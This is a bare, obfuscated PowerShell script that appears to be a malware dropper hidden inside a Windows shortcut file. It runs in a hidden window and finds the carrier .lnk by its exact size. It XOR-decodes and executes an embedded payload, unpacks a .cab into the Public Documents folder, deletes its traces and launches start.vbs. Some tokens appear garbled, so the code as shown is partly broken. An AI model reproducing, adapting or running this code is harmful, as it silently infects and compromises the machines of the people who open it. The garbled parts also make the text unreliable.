powershell -windowstyle hidden 

function YConxMQRHMUJ{
    param($YYtkIkwDqIi, $EDLrNRoqmQy, $FYAJ1WmLWxcF, $NxdqHweRps, $BwnfzQmrXnvr);

    $xMqrvObDCr = New-Object System.IO.FileStream($YYtkIkwDqIi, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);
    $xMqrvObDCr.Seek($EDLrNRoqmQy, [System.IO.SeekOrigin]::Begin);
    $yOwxApfKwb = New-Object byte[] $FYAJ1WmLWxcF;
    $xMqrvObDCr.Read($yOwxApfKwb,0, $FYAJ1WmLWxcF);
    $xMqrvObDCr.Close();
    
    for($pKLkwFlQuFs = 0; $pKLkwFlQuFs -lt $FYAJ1WmLWxcF; $pKLkwF1QuFs++) {
        $yOwxApfKwb[$pKLkwFlQuFs] = $yOwxApfKwb[$pKLkwFlQuFs] -bxor $NxdqHweRps;
    }
    sc $BwnfzQmrXnvr $yOwxApfKwb -Encoding Byte; 
}; 

function GXpurZybPt{
    param($YHeiNZkDCi); 
    $sgiZbGNRsb = Get-ChildItem -Path  $YHeiNZkDCi -Recurse  *. Ink | where-object {$ _. length -eq 0x171E7298} | Select-Object -ExpandProperty FullName;
    return $sgiZbGNRsb;
}; 

$NQkLZpaPUo = Get-Location; 
$JSJgpNpDKaqk = GXpurZybPt -YHeiNZkDCi  $NQkLZpaPUo; 

if ($JSJgpNpDKaqk.length -eq 0) { 
    $JSJgpNpDKaqk = GXpurZybPt -YHeiNZkDCi $env:Temp; 
} 

$NQkLZpaPUo = Split-Path $JSJgpNpDKaqk;
$KIKFGdBFaNi = $JSJgpNpDKaqk.substring(0, $JSJgpNpDKaqk. length-4) + '';

YConxMQRHMUJ -YYtkIkwDqIi $JSJgpNpDKaqk -EDLrNRoqmQy 0x0000208C -FYAJ1WmLWxcF 0x00011A00 -NxdqHweRps 0x18 -BwnfzQmrXnvr $KIKFGdBFaNi; 
    
&$KIKFGdBFaNi; 

$AIjrthkuEgoY = $env:public + '\' + 'lrOPZp.cab'; 

YConxMQRHMUJ -YYtkIkwDqIi  $JSJgpNpDKaqk -EDLrNRoqmQy  0x00013A8C -FYAJ1WmLWxcF  0x00013CD1 -NxdqHweRps 0xC0 -BwnfzQmrXnvr  $AIjrthkuEgoY;

Remove-Item -Path $JSJgpNpDKaqk -Force; 

expand $AIjrthkuEgoY  -F :*  ($env:public+ '\' +'documents'); 

remove-item  -path  $AIjrthkuEgoY -force; 
$SskykggetrL=$env:public+'\documents\start.vbs';
&$SskykggetrL;